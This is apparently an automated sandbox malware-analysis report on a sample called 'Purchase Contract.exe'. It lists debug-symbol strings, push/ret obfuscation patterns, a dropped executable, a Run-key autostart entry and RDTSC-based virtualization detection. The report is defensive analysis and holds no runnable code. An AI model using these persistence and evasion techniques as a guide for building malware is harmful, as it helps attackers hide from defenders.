   Source: Binary string: cmmon32.pdb source: updategtmlg.exe, 0000000D.00000002.1172851048.0000000005790000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000003.1178323049.0000000000730000.00000004.00000001.sdmp
   Source: Binary string: cmmon32.pdbGCTL source: updategtmlg.exe, 0000000D.00000002.1172851048.0000000005790000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000003.1178323049.0000000000730000.00000004.00000001.sdmp
   Source: Binary string: control.pdb source: Purchase Contract.exe, 00000000.00000002.809957748.000000000125B000.00000004.00000001.sdmp
   Source: Binary string: wntdll.pdbUGP source: Purchase Contract.exe, 00000000.00000002.814464607.0000000005D30000.00000040.00000001.sdmp, control.exe, 00000003.00000002.2008031582.00000000045AF000.00000040.00000001.sdmp, updategtmlg.exe, 0000000D.00000002.1174356895.00000000062DF000.00000040.00000001.sdmp, cmmon32.exe, 0000000E.00000002.1171387497.0000000004ECF000.00000040.00000001.sdmp, updategtmlg.exe, 0000000F.00000002.1185902885.0000000005340000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.1184353663.0000000004910000.00000040.00000001.sdmp
   Source: Binary string: wntdll.pdb source: Purchase Contract.exe, control.exe, updategtmlg.exe, cmmon32.exe, updategtmlg.exe, 0000000F.00000002.1185902885.0000000005340000.00000040.00000001.sdmp, cmmon32.exe, 00000010.00000002.1184353663.0000000004910000.00000040.00000001.sdmp
   Source: Binary string: control.pdbUGP source: Purchase Contract.exe, 00000000.00000002.809957748.000000000125B000.00000004.00000001.sdmp
   Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.784714178.0000000007010000.00000002.00000001.sdmp

#### Data Obfuscation:

 Uses code obfuscation techniques (call, push, ret)
   Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_00A62AC2 push eax; ret 0_2_00A62AC3
   Source: C:\Users\user\Desktop\Purchase Contract.exe Code function: 0_2_05DADE2D push ecx; ret 0_2_05DADE40
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0450DE2D push ecx; ret 3_2_0450DE40
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_02979A82 push eax; ret 3_2_02979A88
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_02979A8B push eax; ret 3_2_02979AF2
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_029652F9 pushfd ; retf 3_2_029652EA
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_02979AEC push eax; ret 3_2_02979AF2
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_029652E9 pushfd ; retf 3_2_029652EA
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0296521A push esi; iretd 3_2_02965226
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_02979A35 push eax; ret 3_2_02979A88
   Source: C:\Windows\SysWOW64\control.exe Code function: 3_2_0296D9CD push ds; retf 3_2_0296D9CE
   Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_00EE2AC2 push eax; ret 13_2_00EE2AC3
   Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exe Code function: 13_2_0623DE2D push ecx; ret 13_2_0623DE40
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_04E2DE2D push ecx; ret 14_2_04E2DE40
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C2D9CD push ds; retf 14_2_00C2D9CE
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C252E9 pushfd ; retf 14_2_00C252EA
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C39AEC push eax; ret 14_2_00C39AF2
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C252F9 pushfd ; retf 14_2_00C252EA
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C39A82 push eax; ret 14_2_00C39A88
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C39A8B push eax; ret 14_2_00C39AF2
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C2521A push esi; iretd 14_2_00C25226
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C39A35 push eax; ret 14_2_00C39A88
   Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 14_2_00C33BEB push ebx; retf 14_2_00C33BEE

#### Persistence and Installation Behavior:

 Drops PE files
   Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\S-zzxp\updategtmlg.exe

#### Boot Survival:

 Creates an autostart registry key
   Source: C:\Windows\SysWOW64\control.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 6LDTLHHPCD

#### Hooking and other Techniques for Hiding and Protection:

 Disables application error messages (SetErrorMode)

#### Malware Analysis System Evasion:

 Tries to detect virtualization through RDTSC time measurements